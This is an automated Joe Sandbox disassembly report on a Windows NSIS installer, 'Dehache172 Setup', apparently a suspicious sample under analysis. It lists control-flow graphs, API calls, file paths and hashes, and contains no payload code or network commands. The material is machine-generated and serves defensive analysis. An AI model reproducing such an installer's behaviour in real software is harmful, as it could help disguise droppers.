4957->4958 4958->4957 4959->4954 5611 4016bb 5612 402bce 17 API calls 5611->5612 5613 4016c1 GetFullPathNameA 5612->5613 5614 4016f9 5613->5614 5615 4016d8 5613->5615 5616 402a5a 5614->5616 5617 40170d GetShortPathNameA 5614->5617 5615->5614 5618 40646b 2 API calls 5615->5618 5617->5616 5619 4016e9 5618->5619 5619->5614 5621 4060f7 lstrcpynA 5619->5621 5621->5614

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 8 403393 1->8 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 8->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 22 4033da 17->22 22->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 43 4035b4-4035ce DeleteFileA call 402ea1 33->43 44 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->44 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 56 403524 37->56 41 4034a5-4034d2 38->41 42 40348f-403495 38->42 45 4034d4-4034da 41->45 46 4034e5-403513 41->46 50 403497-403499 42->50 51 40349b 42->51 59 403662-403672 call 403830 OleUninitialize 43->59 60 4035d4-4035da 43->60 44->43 58 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 44->58 52 4034e0 45->52 53 4034dc-4034de 45->53 46->37 55 403531-40353d call 4060f7 46->55 50->41 50->51 51->41 52->46 53->46 53->52 55->33 56->28 58->43 58->59 72 403796-40379c 59->72 73 403678-403688 call 405813 ExitProcess 59->73 63 403652-403659 call 40390a 60->63 64 4035dc-4035e7 call 405aba 60->64 70 40365e 63->70 76 4035e9-403612 64->76 77 40361d-403627 64->77 70->59 74 403818-403820 72->74 75 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->75 85 403822 74->85 86 403826-40382a ExitProcess 74->86 82 4037e9-4037f7 call 406500 75->82 83 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 75->83 84 403614-403616 76->84 79 403629-403636 call 405b7d 77->79 80 40368e-4036a2 call 40577e lstrcatA 77->80 79->59 94 403638-40364e call 4060f7 * 2 79->94 95 4036a4-4036aa lstrcatA 80->95 96 4036af-4036c9 lstrcatA lstrcmpiA 80->96 97 403805-40380f ExitWindowsEx 82->97 98 4037f9-403803 82->98 83->82 84->77 90 403618-40361b 84->90 85->86 90->77 90->84 94->63 95->96 96->59 100 4036cb-4036ce 96->100 97->74 101 403811-403813 call 40140b 97->101 98->97 98->101 103 4036d0-4036d5 call 4056e4 100->103 104 4036d7 call 405761 100->104 101->74 112 4036dc-4036e9 SetCurrentDirectoryA 103->112 104->112 113 4036f6-40371e call 4060f7 112->113 114 4036eb-4036f1 call 4060f7 112->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 124 40378a-403791 call 405ed6 121->124 122->121 123 403754-403774 call 405ed6 call 40618a call 405796 122->123 123->121 133 403776-40377d CloseHandle 123->133 124->59 133->121
                                                                                                                                                              APIs
                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 0040336D
                                                                                                                                                              • GetVersion.KERNEL32 ref: 00403373
                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                                                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                                                                                                              • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                                                                                                              • GetCommandLineA.KERNEL32(Dehache172 Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",00000020,"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                                                                                                              • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                                                                                                              • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                                                                                                                • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                                                                                                • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                                                                                                • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Annegrete,1033,Dehache172 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Dehache172 Setup: Installing,00000000,00000002,74DF3410), ref: 004039FA
                                                                                                                                                                • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                                                                                                                • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                                                                                                                • Part of subcall function 0040390A: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Annegrete), ref: 00403A61
                                                                                                                                                                • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                                                                                                                • Part of subcall function 00403830: CloseHandle.KERNEL32(000002EC,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                                                                                                              • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403688
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040382A
                                                                                                                                                                • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                                              • String ID: "$"C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Annegrete$C:\Users\user\AppData\Roaming\Annegrete$C:\Users\user\Desktop$C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe$Dehache172 Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                                                                                                              • API String ID: 3776617018-2814930959
                                                                                                                                                              • Opcode ID: 45557673b70d31c6557d73d1f51dad10eed35602e5154fdc4010e6f284bfc52e
                                                                                                                                                              • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                                                                                                              • Opcode Fuzzy Hash: 45557673b70d31c6557d73d1f51dad10eed35602e5154fdc4010e6f284bfc52e
                                                                                                                                                              • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 134 40535c-405378 135 405507-40550d 134->135 136 40537e-405445 GetDlgItem * 3 call 4041b0 call 404aa1 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 405537-405543 135->138 139 40550f-405531 GetDlgItem CreateThread CloseHandle 135->139 157 405463-405466 136->157 158 405447-405461 SendMessageA * 2 136->158 141 405565-40556b 138->141 142 405545-40554b 138->142 139->138 146 4055c0-4055c3 141->146 147 40556d-405573 141->147 144 405586-40558d call 4041e2 142->144 145 40554d-405560 ShowWindow * 2 call 4041b0 142->145 154 405592-405596 144->154 145->141 146->144 149 4055c5-4055cb 146->149 151 405575-405581 call 404154 147->151 152 405599-4055a9 ShowWindow 147->152 149->144 159 4055cd-4055e0 SendMessageA 149->159 151->144 155 4055b9-4055bb call 404154 152->155 156 4055ab-4055b4 call 40521e 152->156 155->146 156->155 163 405476-40548d call 40417b 157->163 164 405468-405474 SendMessageA 157->164 158->157 165 4055e6-405612 CreatePopupMenu call 40618a AppendMenuA 159->165 166 4056dd-4056df 159->166 173 4054c3-4054e4 GetDlgItem SendMessageA 163->173 174 40548f-4054a3 ShowWindow 163->174 164->163 171 405614-405624 GetWindowRect 165->171 172 405627-40563d TrackPopupMenu 165->172 166->154 171->172 172->166 176 405643-40565d 172->176 173->166 175 4054ea-405502 SendMessageA * 2 173->175 177 4054b2 174->177 178 4054a5-4054b0 ShowWindow 174->178 175->166 180 405662-40567d SendMessageA 176->180 179 4054b8-4054be call 4041b0 177->179 178->179 179->173 180->180 181 40567f-40569f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->181 183 4056a1-4056c1 SendMessageA 181->183 183->183 184 4056c3-4056d7 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->166
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405407
                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                                                                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                                                                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                                                                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                                                                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                                                                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                                                                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                                                                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                                                                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                                                                                                                                • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405531
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405554
                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004055A1
                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004055E6
                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004055FB
                                                                                                                                                              • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405680
                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405686
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                                                                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                                                                                                                              • SetClipboardData.USER32(?,00000000), ref: 004056D1
                                                                                                                                                              • CloseClipboard.USER32 ref: 004056D7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                              • String ID: Dehache172 Setup: Installing$t}v
                                                                                                                                                              • API String ID: 590372296-1928074025
                                                                                                                                                              • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                                                                                                              • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                                                                                                                              • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                                                                                                                              • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 493 4058bf-4058e5 call 405b7d 496 4058e7-4058f9 DeleteFileA 493->496 497 4058fe-405905 493->497 498 405a88-405a8c 496->498 499 405907-405909 497->499 500 405918-405928 call 4060f7 497->500 501 405a36-405a3b 499->501 502 40590f-405912 499->502 508 405937-405938 call 405ad6 500->508 509 40592a-405935 lstrcatA 500->509 501->498 504 405a3d-405a40 501->504 502->500 502->501 506 405a42-405a48 504->506 507 405a4a-405a52 call 40646b 504->507 506->498 507->498 517 405a54-405a68 call 405a8f call 405877 507->517 510 40593d-405940 508->510 509->510 513 405942-405949 510->513 514 40594b-405951 lstrcatA 510->514 513->514 516 405956-405974 lstrlenA FindFirstFileA 513->516 514->516 518 40597a-405991 call 405aba 516->518 519 405a2c-405a30 516->519 529 405a80-405a83 call 40521e 517->529 530 405a6a-405a6d 517->530 527 405993-405997 518->527 528 40599c-40599f 518->528 519->501 521 405a32 519->521 521->501 527->528 531 405999 527->531 532 4059a1-4059a6 528->532 533 4059b2-4059c0 call 4060f7 528->533 529->498 530->506 535 405a6f-405a7e call 40521e call 405ed6 530->535 531->528 537 4059a8-4059aa 532->537 538 405a0b-405a1d FindNextFileA 532->538 543 4059c2-4059ca 533->543 544 4059d7-4059e2 call 405877 533->544 535->498 537->533 542 4059ac-4059b0 537->542 538->518 541 405a23-405a26 FindClose 538->541 541->519 542->533 542->538 543->538 546 4059cc-4059d5 call 4058bf 543->546 553 405a03-405a06 call 40521e 544->553 554 4059e4-4059e7 544->554 546->538 553->538 556 4059e9-4059f9 call 40521e call 405ed6 554->556 557 4059fb-405a01 554->557 556->538 557->538
                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6948.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                                                                                                              • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                                                                                                              • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\z120X20SO__UK__EKMELAMA.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv6948.tmp$\*.*
                                                                                                                                                              • API String ID: 2035342205-2069798094
                                                                                                                                                              • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                                                                                                              • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                                                                                                              • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                                                                                                              • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(00408524,?,?,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Roaming\Annegrete, xrefs: 00402230
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                              • String ID: C:\Users\user\AppData\Roaming\Annegrete
                                                                                                                                                              • API String ID: 123533781-3646369091
                                                                                                                                                              • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                                                                                                              • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                                                                                                              • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                                                                                                              • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNELBASE(74DF3410,0042C0E0,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,00405BC0,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,C:\Users\user\AppData\Local\Temp\nsv6948.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406482
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\nsv6948.tmp, xrefs: 0040646B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv6948.tmp
                                                                                                                                                              • API String ID: 2295610775-2869690662
                                                                                                                                                              • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                                                                                              • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                                                                                                              • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                                                                                              • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                              • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                                                                                                              • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                                                                                                              • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                                                                                                              • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
